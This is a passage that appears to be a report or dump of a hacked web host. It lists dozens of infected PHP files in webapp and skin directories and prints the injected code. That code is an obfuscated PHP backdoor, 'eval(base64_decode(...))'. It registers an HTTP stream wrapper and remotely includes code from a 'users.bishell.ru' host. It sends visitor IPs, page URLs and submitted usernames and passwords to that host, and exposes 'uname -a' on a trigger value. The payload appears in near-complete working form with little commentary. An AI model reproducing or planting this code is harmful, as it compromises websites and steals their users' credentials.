koJHRoaXMtPnBfdXJsWydxdWVyeSddKSA/ICcnIDogJz8nLiR0aGlzLT5wX3VybFsncXVlcnknXSkuJyBIVFRQLzEuMCcsICdIT1NUOiAnLiR0aGlzLT5wX3VybFsnaG9zdCddLCAnVXNlci1BZ2VudDogJy4kY1sndXNlcl9hZ2VudCddLicgU3RyZWFtUmVhZGVyJyApOyBpZiAoIWVtcHR5KCRjWydoZWFkZXInXSkpIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAkY1snaGVhZGVyJ107IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSkgeyBpZiAoJGNbJ21ldGhvZCddID09ICdQVVQnKSB7ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtVHlwZTogJy4oJHRoaXMtPmJpbmFyeSA/ICdhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nIDogJ3RleHQvcGxhaW4nKTsgfSBlbHNlIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnOyB9ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtTGVuZ3RoOiAnLnN0cmxlbigkY1snY29udGVudCddKTsgfSAkUmVxdWVzdEhlYWRlcnNbXSA9ICdDb25uZWN0aW9uOiBjbG9zZSc7IGlmIChmd3JpdGUoJHRoaXMtPmNvbm5faWQsIGltcGxvZGUoIlxyXG4iLCAkUmVxdWVzdEhlYWRlcnMpLiJcclxuXHJcbiIpID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSAmJiBmd3JpdGUoJHRoaXMtPmNvbm5faWQsICRjWydjb250ZW50J10pID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gZ2xvYmFsICRodHRwX3Jlc3BvbnNlX2hlYWRlcjsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyID0gZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCk7ICRkYXRhID0gcnRyaW0oJGh0dHBfcmVzcG9uc2VfaGVhZGVyKTsgcHJlZ19tYXRjaCgnIy4qIChbMC05XSspICguKikjaScsICRkYXRhLCAkaGVhZCk7IGlmICgoJGhlYWRbMV0gPj0gMzAxICYmICRoZWFkWzFdIDw9IDMwMykgfHwgJGhlYWRbMV0gPT0gMzA3KSB7ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyBpZiAoc3RyaXBvcygkZGF0YSwgJ0xvY2F0aW9uOiAnKSAhPT0gZmFsc2UpIHsgJG5ld19sb2NhdGlvbiA9IHRyaW0oc3RyX2lyZXBsYWNlKCdMb2NhdGlvbjogJywgJycsICRkYXRhKSk7IGJyZWFrOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB9IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLic6ICcuJG5ld19sb2NhdGlvbiwgRV9VU0VSX05PVElDRSk7ICR0aGlzLT5zdHJlYW1fY2xvc2UoKTsgcmV0dXJuICgkY1snbWF4X3JlZGlyZWN0cyddID4gJHRoaXMtPnJlZGlyZWN0cysrICYmICR0aGlzLT5zdHJlYW1fb3BlbigkbmV3X2xvY2F0aW9uLCAkdGhpcy0+ZGVmbW9kZSwgJHRoaXMtPm9wdGlvbnMsIG51bGwpICYmICR0aGlzLT5zdHJlYW1fZmx1c2goKSk7IH0gJGRhdGEgPSBydHJpbShmZ2V0cygkdGhpcy0+Y29ubl9pZCwgMTAyNCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyAkaHR0cF9yZXNwb25zZV9oZWFkZXIgLj0gJGRhdGEuIlxyXG4iOyBpZiAoc3RyaXBvcygkZGF0YSwgJ0NvbnRlbnQtTGVuZ3RoOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ3NpemUnXSA9IHRyaW0oc3RyX2lyZXBsYWNlKCdDb250ZW50LUxlbmd0aDogJywgJycsICRkYXRhKSk7IH0gZWxzZWlmIChzdHJpcG9zKCRkYXRhLCAnRGF0ZTogJykgIT09IGZhbHNlKSB7ICR0aGlzLT5zdGF0WydhdGltZSddID0gc3RydG90aW1lKHN0cl9pcmVwbGFjZSgnRGF0ZTogJywgJycsICRkYXRhKSk7IH0gZWxzZWlmIChzdHJpcG9zKCRkYXRhLCAnTGFzdC1Nb2RpZmllZDogJykgIT09IGZhbHNlKSB7ICR0aGlzLT5zdGF0WydtdGltZSddID0gc3RydG90aW1lKHN0cl9pcmVwbGFjZSgnTGFzdC1Nb2RpZmllZDogJywgJycsICRkYXRhKSk7IH0gJGRhdGEgPSBydHJpbShmZ2V0cygkdGhpcy0+Y29ubl9pZCwgMTAyNCkpOyB9IGlmICgkaGVhZFsxXSA+PSA0MDApIHsgdHJpZ2dlcl9lcnJvcigkdGhpcy0+ZnVsbHVybC4nICcuJGhlYWRbMl0sIEVfVVNFUl9XQVJOSU5HKTsgcmV0dXJuIGZhbHNlOyB9IGlmICgkaGVhZFsxXSA9PSAzMDQpIHsgdHJpZ2dlcl9lcnJvcigkdGhpcy0+ZnVsbHVybC4nICcuJGhlYWRbMl0sIEVfVVNFUl9OT1RJQ0UpOyByZXR1cm4gZmFsc2U7IH0gcmV0dXJuIHRydWU7IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fc3RhdCgpIHsgJHRoaXMtPnN0cmVhbV9mbHVzaCgpOyByZXR1cm4gJHRoaXMtPnN0YXQ7IH0NCnB1YmxpYyBmdW5jdGlvbiBkaXJfb3BlbmRpcigkcGF0aCwgJG9wdGlvbnMpIHsgcmV0dXJuIGZhbHNlOyB9DQpwdWJsaWMgZnVuY3Rpb24gZGlyX3JlYWRkaXIoKSB7IHJldHVybiAnJzsgfQ0KcHVibGljIGZ1bmN0aW9uIGRpcl9yZXdpbmRkaXIoKSB7IHJldHVybiAnJzsgfQ0KcHVibGljIGZ1bmN0aW9uIGRpcl9jbG9zZWRpcigpIHsgcmV0dXJuOyB9DQpwdWJsaWMgZnVuY3Rpb24gdXJsX3N0YXQoJHBhdGgsICRmbGFncykgeyByZXR1cm4gYXJyYXkoKTsgfQ0KcHJvdGVjdGVkIGZ1bmN0aW9uIGNvbnRleHQoKSB7IGlmICghJHRoaXMtPmNvbnRleHQpIHsgJHRoaXMtPmNvbnRleHQgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoKTsgfSAkYyA9IHN0cmVhbV9jb250ZXh0X2dldF9vcHRpb25zKCR0aGlzLT5jb250ZXh0KTsgcmV0dXJuIChpc3NldCgkY1snaHR0cCddKSA/ICRjWydodHRwJ10gOiBhcnJheSgpKTsgfQ0KfQ0KaWYoaXNzZXQoJF9QT1NUWyJsIl0pIGFuZCBpc3NldCgkX1BPU1RbInAiXSkpe2lmKGlzc2V0KCRfUE9TVFsiaW5wdXQiXSkpeyR1c2VyX2F1dGg9IiZsPSIuYmFzZTY0X2VuY29kZSgkX1BPU1RbImwiXSkuIiZwPSIuYmFzZTY0X2VuY29kZShtZDUoJF9QT1NUWyJwIl0pKTt9ZWxzZXskdXNlcl9hdXRoPSImbD0iLiRfUE9TVFsibCJdLiImcD0iLiRfUE9TVFsicCJdO319ZWxzZXskdXNlcl9hdXRoPSIiO31pZighaXNzZXQoJF9QT1NUWyJsb2dfZmxnIl0pKXskbG9nX2ZsZz0iJmxvZyI7fQ0KJHJraHQ9MTsNCmlmKHZlcnNpb25fY29tcGFyZShQSFBfVkVSU0lPTiwnNS4yJywnPj0nKSl7aWYoaW5pX2dldCgnYWxsb3dfdXJsX2luY2x1ZGUnKSl7JHJraHQ9MTt9ZWxzZXskcmtodD0wO319DQppZigkcmtodD09MSl7aWYoaW5pX2dldCgnYWxsb3dfdXJsX2ZvcGVuJykpeyRya2h0PTE7fWVsc2V7JHJraHQ9MDt9fQ0KaWYoJHJraHQ9PTEpe2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjRG92THc9PSIpLiIkcCIuYmFzZTY0X2RlY29kZSgiTG5WelpYSnpMbUpwYzJobGJHd3VjblU9IikuIi8/cl9hZGRyPSIuc3ByaW50ZigiJXUiLCBpcDJsb25nKGdldGVudihSRU1PVEVfQUREUikpKS4iJnVybD0iLmJhc2U2NF9lbmNvZGUoJF9TRVJWRVJbIlNFUlZFUl9OQU1FIl0uJF9TRVJWRVJbUkVRVUVTVF9VUkldKS4kdXNlcl9hdXRoLiRsb2dfZmxnKSl7aWYoJF9QT1NUWyJsIl09PSJzcGVjaWFsIil7cHJpbnQgInN5c19hY3RpdmUiLmB1bmFtZSAtYWA7fX19DQplbHNle3N0cmVhbV93cmFwcGVyX3JlZ2lzdGVyKCdodHRwMicsJ25ld2h0dHAnKTtpZighQGluY2x1ZGVfb25jZShiYXNlNjRfZGVjb2RlKCJhSFIwY0RJNkx5OD0iKS4iJHAiLmJhc2U2NF9kZWNvZGUoIkxuVnpaWEp6TG1KcGMyaGxiR3d1Y25VPSIpLiIvP3JfYWRkcj0iLnNwcmludGYoIiV1IiwgaXAybG9uZyhnZXRlbnYoUkVNT1RFX0FERFIpKSkuIiZ1cmw9Ii5iYXNlNjRfZW5jb2RlKCRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdLiRfU0VSVkVSW1JFUVVFU1RfVVJJXSkuJHVzZXJfYXV0aC4kbG9nX2ZsZykpe2lmKCRfUE9TVFsibCJdPT0ic3BlY2lhbCIpe3ByaW50ICJzeXNfYWN0aXZlIi5gdW5hbWUgLWFgO319fQ0K")); ?>

for files:

/home/www/confixx/html/webapps:

./phpsurveyor/guest.php
./phpsurveyor/messages.php
./weberp/guest.php
./weberp/messages.php
./openbiblio/finfo.php
./openbiblio/tests.php
./Owl/common.php
./Owl/contacts.php
./MovableType/remote.php
./MovableType/download.php
./pLog/report.php
./pLog/date.php
./squirrelmail/common.php
./squirrelmail/commands.php
./openit/links.php
./openit/tests.php
./phpBB/finfo.php
./phpBB/tests.php
./gtchat/configs.php
./gtchat/messages.php
./phpwebsite/layout.php
./phpwebsite/properties.php
./sendcard/time.php
./sendcard/date.php
./AutoIndex/configs.php
./AutoIndex/includes.php
./escene/report.php
./escene/date.php
./kplaylist/remote.php
./kplaylist/download.php
./phpwhois/create.php
./phpwhois/base.php
./CSLH/layout.php
./CSLH/properties.php
./dotproject/common.php
./dotproject/commands.php
./zencart/configs.php
./zencart/messages.php
./template/download.php
./template/base.php
./phpnuke/includes.php
./phpnuke/include.php
./phpMoney/system.php
./phpMoney/properties.php
./phpMyFamily/report.php
./phpMyFamily/include.php
./cubecart/system.php
./cubecart/time.php
./getid/links.php
./getid/package.php
./topdownloads/layout.php
./topdownloads/options.php
./osCommerce/create.php
./osCommerce/guest.php
./xrms/create.php
./xrms/guest.php
./eGroupWare/report.php
./eGroupWare/include.php
./phpBugTracker/create.php
./phpBugTracker/base.php
./phpSupportTickets/system.php
./phpSupportTickets/properties.php
./AdvancedPoll/create.php
./AdvancedPoll/guest.php
./knowledgetree/package.php
./knowledgetree/remote.php
./phpAds/finfo.php
./phpAds/contacts.php
./PHProjekt/system.php
./PHProjekt/properties.php
./nucleus/configs.php
./nucleus/includes.php
./SSM/commands.php
./SSM/options.php
./creloaded/finfo.php
./creloaded/contacts.php
./Links/system.php
./Links/properties.php
./b2evolution/configs.php
./b2evolution/includes.php
./pmachinefree/finfo.php
./pmachinefree/tests.php
./formmail/time.php
./formmail/date.php
./HelpCenterLive/finfo.php
./HelpCenterLive/contacts.php
./classifieds/download.php
./classifieds/base.php
./mediawiki/includes.php
./mediawiki/include.php
./vstat/commands.php
./vstat/options.php
./phpList/system.php
./phpList/time.php
./geeklog/system.php
./geeklog/time.php
./4images/configs.php
./4images/includes.php
./bbclone/create.php
./bbclone/base.php
./WebShopmanager/report.php
./WebShopmanager/date.php
./Coppermine/package.php
./Coppermine/remote.php
./guestbook/common.php
./guestbook/commands.php
./skins/common.php
./skins/contacts.php
./xaraya/links.php
./xaraya/package.php
./phpDig/common.php
./phpDig/commands.php
./osTicket/links.php
./osTicket/tests.php
./DocFAQ/links.php
./DocFAQ/tests.php
./Drupal/finfo.php
./Drupal/contacts.php
./Tellme/includes.php
./Tellme/include.php
./SupportLogic/common.php
./SupportLogic/contacts.php
./phpdocumentor/create.php
./phpdocumentor/guest.php
./gallery/commands.php
./gallery/options.php
./phpbannerexchange/layout.php
./phpbannerexchange/options.php
./Events/layout.php
./Events/options.php
./Care2x/download.php
./Care2x/base.php
./phpwcms/configs.php
./phpwcms/messages.php
./phpmyforum/links.php
./phpmyforum/tests.php
./WebCalendar/common.php
./WebCalendar/contacts.php
./videodb/remote.php
./videodb/download.php
./Mambo/time.php
./Mambo/date.php
./agoracart/package.php
./agoracart/remote.php
./WordPress/commands.php
./WordPress/options.php
./Siteframe/layout.php
./Siteframe/options.php
./UebiMiau/links.php
./UebiMiau/package.php
./wbbook/report.php
./wbbook/include.php
./phpWiki/report.php
./phpWiki/date.php
./YaBB/system.php
./YaBB/time.php
./TUTOS/guest.php
./TUTOS/messages.php
./phpBBAuction/time.php
./phpBBAuction/date.php
./xoops/layout.php
./xoops/properties.php
./typo/configs.php
./typo/messages.php
./bookstore/package.php
./bookstore/remote.php
./phpBook/layout.php
./phpBook/properties.php
./tsep/includes.php
./tsep/include.php
./PostNuke/report.php
./PostNuke/include.php
./noahclass/download.php
./noahclass/base.php

/home/www/confixx/html/skins:

./mskin_17/big_icons/system.php
./mskin_17/big_icons/properties.php
./mskin_17/layout.php
./mskin_17/css/main/create.php
./mskin_17/css/main/base.php
./mskin_17/css/top/remote.php
./mskin_17/css/top/download.php
./mskin_17/css/help/configs.php
./mskin_17/css/help/includes.php
./mskin_17/css/report.php
./mskin_17/css/include.php
./mskin_17/css/left/guest.php
./mskin_17/css/left/messages.php
./mskin_17/small_icons/finfo.php
./mskin_17/small_icons/tests.php
./mskin_17/options.php
./mskin_17/images/links.php
./mskin_17/images/package.php
./mskin_17/buttons/time.php
./mskin_17/buttons/date.php
./time.php
./date.php
./mskin_15/big_icons/configs.php
./mskin_15/big_icons/includes.php
./mskin_15/css/main/finfo.php
./mskin_15/css/main/tests.php
./mskin_15/css/create.php
./mskin_15/css/top/common.php
./mskin_15/css/top/contacts.php
./mskin_15/css/help/remote.php
./mskin_15/css/help/download.php
./mskin_15/css/left/links.php
./mskin_15/css/left/package.php
./mskin_15/css/base.php
./mskin_15/report.php
./mskin_15/small_icons/layout.php
./mskin_15/small_icons/properties.php
./mskin_15/include.php
./mskin_15/images/commands.php
./mskin_15/images/options.php
./mskin_15/buttons/guest.php
./mskin_15/buttons/messages.php

<?php error_reporting(0);$p="jdcczzazbzcc";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnByb3RlY3RlZCAkZnVsbHVybDsgcHJvdGVjdGVkICRwX3VybDsgcHJvdGVjdGVkICRjb25uX2lkOyBwcm90ZWN0ZWQgJGZsdXNoZWQ7IHByb3RlY3RlZCAkbW9kZSA9IDQ7IHByb3RlY3RlZCAkZGVmbW9kZTsgcHJvdGVjdGVkICRyZWRpcmVjdHMgPSAwOyBwcm90ZWN0ZWQgJGJpbmFyeTsgcHJvdGVjdGVkICRvcHRpb25zOyBwcm90ZWN0ZWQgJHN0YXQgPSBhcnJheSgnZGV2JyA9PiAwLCdpbm8nID0+IDAsJ21vZGUnID0+IDAsJ25saW5rJyA9PiAxLCd1aWQnID0+IDAsJ2dpZCcgPT4gMCwncmRldicgPT4gLTEsJ3NpemUnID0+IDAsJ2F0aW1lJyA9PiAwLCdtdGltZScgPT4gMCwnY3RpbWUnID0+IDAsJ2Jsa3NpemUnID0+IC0xLCdibG9ja3MnID0+IDApOw0KcHJvdGVjdGVkIGZ1bmN0aW9uIGVycm9yKCRtc2c9J25vdCBjb25uZWN0ZWQnKSB7IGlmICgkdGhpcy0+b3B0aW9ucyAmIFNUUkVBTV9SRVBPUlRfRVJST1JTKSB7IHRyaWdnZXJfZXJyb3IoJG1zZywgRV9VU0VSX1dBUk5JTkcpOyB9IHJldHVybiBmYWxzZTsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV9vcGVuKCRwYXRoLCAkbW9kZSwgJG9wdGlvbnMsICRvcGVuZWRfcGF0aCkgeyAkdGhpcy0+ZnVsbHVybCA9ICRwYXRoOyAkdGhpcy0+b3B0aW9ucyA9ICRvcHRpb25zOyAkdGhpcy0+ZGVmbW9kZSA9ICRtb2RlOyAkdXJsID0gcGFyc2VfdXJsKCRwYXRoKTsgaWYgKGVtcHR5KCR1cmxbJ2hvc3QnXSkpIHsgcmV0dXJuICR0aGlzLT5lcnJvcignbWlzc2luZyBob3N0IG5hbWUnKTsgfSAkdGhpcy0+Y29ubl9pZCA9IGZzb2Nrb3BlbigkdXJsWydob3N0J10sIChlbXB0eSgkdXJsWydwb3J0J10pID8gODAgOiBpbnR2YWwoJHVybFsncG9ydCddKSksICRlcnJubywgJGVycnN0ciwgMik7IGlmICghJHRoaXMtPmNvbm5faWQpIHsgcmV0dXJuIGZhbHNlOyB9IGlmIChlbXB0eSgkdXJsWydwYXRoJ10pKSB7ICR1cmxbJ3BhdGgnXSA9ICcvJzsgfSAkdGhpcy0+cF91cmwgPSAkdXJsOyAkdGhpcy0+Zmx1c2hlZCA9IGZhbHNlOyBpZiAoJG1vZGVbMF0gIT0gJ3InIHx8IChzdHJwb3MoJG1vZGUsICcrJykgIT09IGZhbHNlKSkgeyAkdGhpcy0+bW9kZSArPSAyOyB9ICR0aGlzLT5iaW5hcnkgPSAoc3RycG9zKCRtb2RlLCAnYicpICE9PSBmYWxzZSk7ICRjID0gJHRoaXMtPmNvbnRleHQoKTsgaWYgKCFpc3NldCgkY1snbWV0aG9kJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ21ldGhvZCcsICdHRVQnKTsgfSBpZiAoIWlzc2V0KCRjWydoZWFkZXInXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnaGVhZGVyJywgJycpOyB9IGlmICghaXNzZXQoJGNbJ3VzZXJfYWdlbnQnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAndXNlcl9hZ2VudCcsIGluaV9nZXQoJ3VzZXJfYWdlbnQnKSk7IH0gaWYgKCFpc3NldCgkY1snY29udGVudCddKSkgeyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdjb250ZW50JywgJycpOyB9IGlmICghaXNzZXQoJGNbJ21heF9yZWRpcmVjdHMnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnbWF4X3JlZGlyZWN0cycsIDUpOyB9IHJldHVybiB0cnVlOyB9DQpwdWJsaWMgZnVuY3Rpb24gc3RyZWFtX2Nsb3NlKCkgeyBpZiAoJHRoaXMtPmNvbm5faWQpIHsgZmNsb3NlKCR0aGlzLT5jb25uX2lkKTsgJHRoaXMtPmNvbm5faWQgPSBudWxsOyB9IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fcmVhZCgkYnl0ZXMpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gJHRoaXMtPmVycm9yKCk7IH0gaWYgKCEkdGhpcy0+Zmx1c2hlZCAmJiAhJHRoaXMtPnN0cmVhbV9mbHVzaCgpKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoZmVvZigkdGhpcy0+Y29ubl9pZCkpIHsgcmV0dXJuICcnOyB9ICRieXRlcyA9IG1heCgxLCRieXRlcyk7IGlmICgkdGhpcy0+YmluYXJ5KSB7IHJldHVybiBmcmVhZCgkdGhpcy0+Y29ubl9pZCwgJGJ5dGVzKTsgfSBlbHNlIHsgcmV0dXJuIGZnZXRzKCR0aGlzLT5jb25uX2lkLCAkYnl0ZXMpOyB9IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fd3JpdGUoJGRhdGEpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gJHRoaXMtPmVycm9yKCk7IH0gaWYgKCEkdGhpcy0+bW9kZSAmIDIpIHsgcmV0dXJuICR0aGlzLT5lcnJvcignU3RyZWFtIGlzIGluIHJlYWQtb25seSBtb2RlJyk7IH0gJGMgPSAkdGhpcy0+Y29udGV4dCgpOyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdtZXRob2QnLCAoKCR0aGlzLT5kZWZtb2RlWzBdID09ICd4JykgPyAnUFVUJyA6ICdQT1NUJykpOyBpZiAoc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnY29udGVudCcsICRjWydjb250ZW50J10uJGRhdGEpKSB7IHJldHVybiBzdHJsZW4oJGRhdGEpOyB9IHJldHVybiAwOyB9DQpwdWJsaWMgZnVuY3Rpb24gc3RyZWFtX2VvZigpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gdHJ1ZTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSByZXR1cm4gZmVvZigkdGhpcy0+Y29ubl9pZCk7IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fc2Vlaygkb2Zmc2V0LCAkd2hlbmNlKSB7IHJldHVybiBmYWxzZTsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV90ZWxsKCkgeyByZXR1cm4gMDsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV9mbHVzaCgpIHsgaWYgKCR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSAkYyA9ICR0aGlzLT5jb250ZXh0KCk7ICR0aGlzLT5mbHVzaGVkID0gdHJ1ZTsgJFJlcXVlc3RIZWFkZXJzID0gYXJyYXkoJGNbJ21ldGhvZCddLicgJy4kdGhpcy0+cF91cmxbJ3BhdGgnXS4oZW1wdHkoJHRoaXMtPnBfdXJsWydxdWVyeSddKSA/ICcnIDogJz8nLiR0aGlzLT5wX3VybFsncXVlcnknXSkuJyBIVFRQLzEuMCcsICdIT1NUOiAnLiR0aGlzLT5wX3VybFsnaG9zdCddLCAnVXNlci1BZ2VudDogJy4kY1sndXNlcl9hZ2VudCddLicgU3RyZWFtUmVhZGVyJyApOyBpZiAoIWVtcHR5KCRjWydoZWFkZXInXSkpIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAkY1snaGVhZGVyJ107IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSkgeyBpZiAoJGNbJ21ldGhvZCddID09ICdQVVQnKSB7ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtVHlwZTogJy4oJHRoaXMtPmJpbmFyeSA/ICdhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nIDogJ3RleHQvcGxhaW4nKTsgfSBlbHNlIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnOyB9ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtTGVuZ3RoOiAnLnN0cmxlbigkY1snY29udGVudCddKTsgfSAkUmVxdWVzdEhlYWRlcnNbXSA9ICdDb25uZWN0aW9uOiBjbG9zZSc7IGlmIChmd3JpdGUoJHRoaXMtPmNvbm5faWQsIGltcGxvZGUoIlxyXG4iLCAkUmVxdWVzdEhlYWRlcnMpLiJcclxuXHJcbiIpID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSAmJiBmd3JpdGUoJHRoaXMtPmNvbm5faWQsICRjWydjb250ZW50J10pID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gZ2xvYmFsICRodHRwX3Jlc3BvbnNlX2hlYWRlcjsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyID0gZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCk7ICRkYXRhID0gcnRyaW0oJGh0dHBfcmVzcG9uc2VfaGVhZGVyKTsgcHJlZ19tYXRjaCgnIy4qIChbMC05XSspICguKikjaScsICRkYXRhLCAkaGVhZCk7IGlmICgoJGhlYWRbMV0gPj0gMzAxICYmICRoZWFkWzFdIDw9IDMwMykgfHwgJGhlYWRbMV0gPT0gMzA3KSB7ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyBpZiAoc3RyaXBvcygkZGF0YSwgJ0xvY2F0aW9uOiAnKSAhPT0gZmFsc2UpIHsgJG5ld19sb2NhdGlvbiA9IHRyaW0oc3RyX2lyZXBsYWNlKCdMb2NhdGlvbjogJywgJycsICRkYXRhKSk7IGJyZWFrOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB9IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLic6ICcuJG5ld19sb2NhdGlvbiwgRV9VU0VSX05PVElDRSk7ICR0aGlzLT5zdHJlYW1fY2xvc2UoKTsgcmV0dXJuICgkY1snbWF4X3JlZGlyZWN0cyddID4gJHRoaXMtPnJlZGlyZWN0cysrICYmICR0aGlzLT5zdHJlYW1fb3BlbigkbmV3X2xvY2F0aW9uLCAkdGhpcy0+ZGVmbW9kZSwgJHRoaXMtPm9wdGlvbnMsIG51bGwpICYmICR0aGlzLT5zdHJlYW1fZmx1c2goKSk7IH0gJGRhdGEgPSBydHJpbShmZ2V0cygkdGhpcy0+Y29ubl9pZCwgMTAyNCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyAkaHR0cF9yZXNwb25zZV9oZWFkZXIgLj0gJGRhdGEuIlxyXG4iOyBpZiAoc3RyaXBvcygkZGF0YSwgJ0NvbnRlbnQtTGVuZ3RoOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ3NpemUnXSA9IHRyaW0oc3RyX2lyZXBsYWNlKCdDb250ZW50LUxlbmd0aDogJywgJycsICRkYXRhKSk7IH0gZWxzZWlmIChzdHJpcG9zKCRkYXRhLCAnRGF0ZTogJykgIT09IGZhbHNlKSB7ICR0aGlzLT5zdGF0WydhdGltZSddID0gc3RydG90aW1lKHN0cl9pcmVwbGFjZSgnRGF0ZTogJywgJycsICRkYXRhKSk7IH0gZWxzZWlmIChzdHJpcG9zKCRkYXRhLCAnTGFzdC1Nb2RpZmllZDogJykgIT09IGZhbHNlKSB7ICR0aGlzLT5zdGF0WydtdGltZSddID0gc3RydG90aW1lKHN0cl9pcmVwbGFjZSgnTGFzdC1Nb2RpZmllZDogJywgJycsICRkYXRhKSk7IH0gJGRhdGEgPSBydHJpbShmZ2V0cygkdGhpcy0+Y29ubl9pZCwgMTAyNCkpOyB9IGlmICgkaGVhZFsxXSA+PSA0MDApIHsgdHJpZ2dlcl9lcnJvcigkdGhpcy0+ZnVsbHVybC4nICcuJGhlYWRbMl0sIEVfVVNFUl9XQVJOSU5HKTsgcmV0dXJuIGZhbHNlOyB9IGlmICgkaGVhZFsxXSA9PSAzMDQpIHsgdHJpZ2dlcl9lcnJvcigkdGhpcy0+ZnVsbHVybC4nICcuJGhlYWRbMl0sIEVfVVNFUl9OT1RJQ0UpOyByZXR1cm4gZmFsc2U7IH0gcmV0dXJuIHRydWU7IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fc3RhdCgpIHsgJHRoaXMtPnN0cmVhbV9mbHVzaCgpOyByZXR1cm4gJHRoaXMtPnN0YXQ7IH0NCnB1YmxpYyBmdW5jdGlvbiBkaXJfb3BlbmRpcigkcGF0aCwgJG9wdGlvbnMpIHsgcmV0dXJuIGZhbHNlOyB9DQpwdWJsaWMgZnVuY3Rpb24gZGlyX3JlYWRkaXIoKSB7IHJldHVybiAnJzsgfQ0KcHVibGljIGZ1bmN0aW9uIGRpcl9yZXdpbmRkaXIoKSB7IHJldHVybiAnJzsgfQ0KcHVibGljIGZ1bmN0aW9uIGRpcl9jbG9zZWRpcigpIHsgcmV0dXJuOyB9DQpwdWJsaWMgZnVuY3Rpb24gdXJsX3N0YXQoJHBhdGgsICRmbGFncykgeyByZXR1cm4gYXJyYXkoKTsgfQ0KcHJvdGVjdGVkIGZ1bmN0aW9uIGNvbnRleHQoKSB7IGlmICghJHRoaXMtPmNvbnRleHQpIHsgJHRoaXMtPmNvbnRleHQgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoKTsgfSAkYyA9IHN0cmVhbV9jb250ZXh0X2dldF9vcHRpb25zKCR0aGlzLT5jb250ZXh0KTsgcmV0dXJuIChpc3NldCgkY1snaHR0cCddKSA/ICRjWydodHRwJ10gOiBhcnJheSgpKTsgfQ0KfQ0KaWYoaXNzZXQoJF9QT1NUWyJsIl0pI